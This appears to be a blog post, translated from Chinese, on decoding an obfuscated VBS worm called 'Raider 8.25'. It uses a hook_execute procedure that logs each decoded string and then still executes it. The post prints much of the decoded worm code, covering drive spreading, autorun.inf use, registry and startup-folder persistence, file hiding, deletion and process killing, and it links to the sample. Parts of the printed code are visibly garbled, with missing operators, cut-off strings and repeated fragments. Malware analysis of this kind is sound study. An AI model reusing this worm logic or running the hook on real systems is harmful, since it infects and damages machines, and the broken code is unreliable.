Tracing and hijacking execute to decode obfuscated VBS

Note from 鬼仔: backups of vbs.rar and ok.txt are attached.

Source: 余弦函数

The approach should be sound: an obfuscated VBS file of only 9.76 KB decodes to a 203 KB file. The source file can be downloaded here: http://www.kingzoo.com/tools/greysign/vbs.rar, or viewed directly here: http://evilcos.googlepages.com/evilvbs8.25.txt. Now let me explain my decoding approach.

In VBS, the execute function evaluates an expression, much like eval in JS. VBS also has an eval function, but it differs slightly from execute. I have already written many articles on decoding JS: for example, you can replace eval with alert to pop up the decoded value, or, for convenience, use the tag decoding trick or document.getElementById() to fetch the decoded result, and so on. In the same way, in VBS you can use msgbox or wscript.echo to display the decoded result.
For convenience, I borrowed a few ideas from others and wrote this VBS procedure:
sub hook_execute(x)
'wscript.echo x
outfile="ok.txt"
set fso=createobject("Scripting.FileSystemObject")
if (fso.fileexists(outfile)) then
' append the plaintext passed to execute to ok.txt (mode 8 = ForAppending)
set objtxt=fso.opentextfile(outfile,8,true,0)
objtxt.write x&vbcrlf
objtxt.close
execute x
else
' first call: create ok.txt, then log and run as above
set objtxt=fso.createtextfile(outfile,True,False)
objtxt.write x&vbcrlf
objtxt.close
execute x
end if
end sub

This hook_execute procedure traces the execute calls inside an obfuscated VBS. One thing is certain: by the time a piece of obfuscated code is passed to execute, it has been turned back into plaintext. hook_execute relies on this: it writes the decoded result to a text file called ok.txt and then carries on with execute. Usage is simple: replace execute in the obfuscated code with hook_execute. Because VBS, like JS, is an interpreted language that runs from top to bottom, one line at a time, when looking for the decoding entry point we should consider the last execute first. Also, today's VBS/VBScript/JS obfuscators like to scramble characteristic strings and join them back together with concatenation operators, either to evade antivirus or to confuse whoever is cracking them; we can use the double quotes (strings live inside double quotes; in VBS the single quote is the comment character) to tell the string fragments apart. Some valuable decoding information may turn up there.
For the first pass, replace the last execute in the obfuscated code with hook_execute and run it to get the decoded result; then edit that first result into the following:
on error resume next
function er(sco)
if err.number<>0 or sco<>0 and rr("ded",1)<>cstr(date) then
wr "oer",rr("oer",1)+abs(sco)
if rr("oer",1)>100 then wr "ded",date:wr "oer",0
end if
end if
end function

' Replace every original execute with hook_execute.
str_t=":hook_execute(uc(dyz)):hook_execute(uc(zcx)):function gt():hook_execute(uc(gtz)):end function:function ei(name,wt):hook_execute(uc(eiz)):end function:function df(wh):hook_execute(uc(dfz)):end function:function bf(wh,wt,da):hook_execute(uc(bfz)):end function:function bi(wh):hook_execute(uc(biz)):end function:function rt(wh,li):hook_execute(uc(rtz)):end function:function wr(rna,rda):hook_execute(uc(wrz)):end function:function rr(rna,pa):hook_execute(uc(rrz)):end function:function ar(file,cg):hook_execute(uc(arz)):end function:function dn(loc,web,ris,min):hook_execute(uc(dnz)):end function:function pr(pcs,gs):hook_execute(uc(prz)):end function:function ec(wt):hook_execute(uc(ecz)):end function:function co(wh):hook_execute(uc(coz)):end function:function rs(sw):hook_execute(uc(rsz)):end function:function hi(sw):hook_execute(uc(hiz)):end function:function gi(ids,fid,eid,fname,furl):hook_execute(uc(giz)):end function:function dw(pcs,fn,furl,kill):hook_execute(uc(dwz)):end function:function us(sw):hook_execute(uc(usz)):end function:function cu():hook_execute(uc(cuz)):end function:function km(sw):hook_execute(uc(kmz)):end function:function cf(wh):hook_execute(uc(cfz)):end function"
execute(str_t)
function uc(b):x="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":y="execute """"":z="&chr(&h":w=")":execute("do while len(x)>1:if isnumeric(left(x,1)) then y=y&z&left(x,2)&w:x=mid(x,3) else y=y&z+left(x,4)+w:x=mid(x,5)"&vbcrlf&"loop"):execute(y):end function
sub hook_execute(x)
'wscript.echo x
outfile="ok.txt"
set fso=createobject("Scripting.FileSystemObject")
if (fso.fileexists(outfile)) then
set objtxt=fso.opentextfile(outfile,8,true,0)
objtxt.write x&vbcrlf
objtxt.close
execute x
else
set objtxt=fso.createtextfile(outfile,True,False)
objtxt.write x&vbcrlf
objtxt.close
execute x
end if
end sub

msgbox "success:-)"
This obfuscated VBS is really cool: it has so many parameters and functions, like a huge and tangled web of information, that cracking it is unnerving :-( . Its own decoding function uc is itself obfuscated, but that is easy to crack too: just replace its execute. To keep a calm mind, always remember: every piece of obfuscated code must eventually be restored to plaintext that its interpreter can recognise. The fully decoded code is as follows:
dim d:j="\":on error resume next
ver="8.25":vs=".vbs":ve=".vbe":j="\":cm="%comspec% /c ":dfo="/8#0/":til="Raider "&ver:inf="\autorun.inf"
set ws=createobject("wscript.shell"):set wmi=getobject("winmgmts:\\.\root\cimv2")
set fso=createobject("scripting.filesystemobject"):set sis=wmi.execquery("select * from win32_operatingsystem")
set dc=fso.drives:ouw=wscript.scriptfullname:win=fso.getspecialfolder(0)&j:dir=fso.getspecialfolder(1)&j
tmp=fso.getspecialfolder(2)&j:wbe=dir&"wbem\":mir=left(ouw,len(ouw)-len(wscript.scriptname))
wsr="createobject(""wscript.shell"").run":cnr="\computername":cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr
cna=rr(cnp,0):if cna="" then cna=til
rpa="HKLM\software\"&cna&j:rop="\software\microsoft\windows\currentversion\explorer\"
sf="shell folders\":fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs:fap=rr("HKCU"&rop&sf&"favorites",0)&j
dap=rr("HKCU"&rop&sf&"desktop",0)&j:rsn=cna:ht=ec("ivwt?56"):ha=ec(":;9::0 then
hd="t"+hc
elseif os2052 then hd="p"+hc:else hd="$"+hc:end if
dim d:j="\":on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0
dim d:j="\":on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0

'........ lots of repetition starts here
'dim d:j="\":on error resume next
'if pa=1 then rna=rpa&rna
'rr=ws.regread(rna)
'if er(0) then rr=0

'........ fragment
if er(0) then rr=0
dim d:j="\":on error resume next
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
dim d:j="\":on error resume next
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
dim d:j="\":on error resume next
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
dim d:j="\":on error resume next
for each d in dc
if mir=d&j then ws.run "explorer "&d,3,false
next
ouc=rt(ouw,-1):if cf(ouw) then msgbox("holle,raider!"):km 1
if sys then
if rr(rsp&"explorer",0)<>"0" then wr rsp&"explorer",-1
hi 1
if rr("til",1)<>til then
wr "til",til
wr "tjs",1
wr "djs",date
wr "ded",0
end if
if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0
if rr(rsp&rsn,0)=ve then rs -1
le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&le
km 0
cu:er 1
wscript.sleep 1000
if rr("ded",1)<>cstr(date) then ws.run ouw
else
wscript.sleep 5000
if pr("wscript.exe",2)=2 then
if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date
end if
if pr("wscript.exe",2)=1 then wscript.quit
ar ouw,7:co dir&ve:co win&ve:rs 1:ws.run dir&ve
end if
dim d:j="\":on error resume next
if li0 and li"'"&ver then cf=true
dim d:j="\":on error resume next
if li0 and liabs(gs) then pr=1
if gsabs(gs) then pr=1
if gsve then
ws.regwrite rsp&rsn,ve,"REG_SZ"
if er(0) and not ei(fsp,1) then bf fsp,wsr&" """&ve&"""",0
elseif sw=-1 then:df fsp
elseif sw=0 then:df fsp:wr rsp&rsn,-1:wr rpa,-1
end if
dim d:j="\":on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0
dim d:j="\":on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)

'........ lots of repetition starts here
'if er(0) then rr=0
'dim d:j="\":on error resume next
'if pa=1 then rna=rpa&rna
'rr=ws.regread(rna)

'........ fragment
if er(0) then rr=0
dim d:j="\":on error resume next
ar wh,0
if ei(wh,1) then fso.deletefile(wh)
if ei(wh,2) then fso.deletefolder(wh)
dim d:j="\":on error resume next
if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing
if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
dim d:j="\":on error resume next
if rda=-1 then ws.regdelete rna else ws.regwrite rpa&rna,rda,"REG_SZ"
dim d:j="\":on error resume next
if rda=-1 then ws.regdelete rna else ws.regwrite rpa&rna,rda,"REG_SZ"

The end...... Source file: http://evilcos.googlepages.com/ok.txt. As for the value of the OO variable in the initial obfuscated VBS, I think it is useless. To find out what this VBS actually does you can trace it with a HIPS tool; otherwise, read through this hideous source slowly.
【Related information】
1. This obfuscated version is 8.25.
2. During decoding this message popped up: holle,raider! (is this the author?)
【Related articles】
1. A perverse encrypted VBS: http://hi.baidu.com/greysign/blog/item/fba23b3f46acd5e855e7232f.html
2. Brain-cell-killing stuff: http://hi.baidu.com/dikex/blog/item/7c1838087ad6af34e824884f.html
3. A by-the-book decoding journey through an encrypted vbs virus: http://hi.baidu.com/fuxudong/blog/item/431ddb2451aa06054c088d02.html
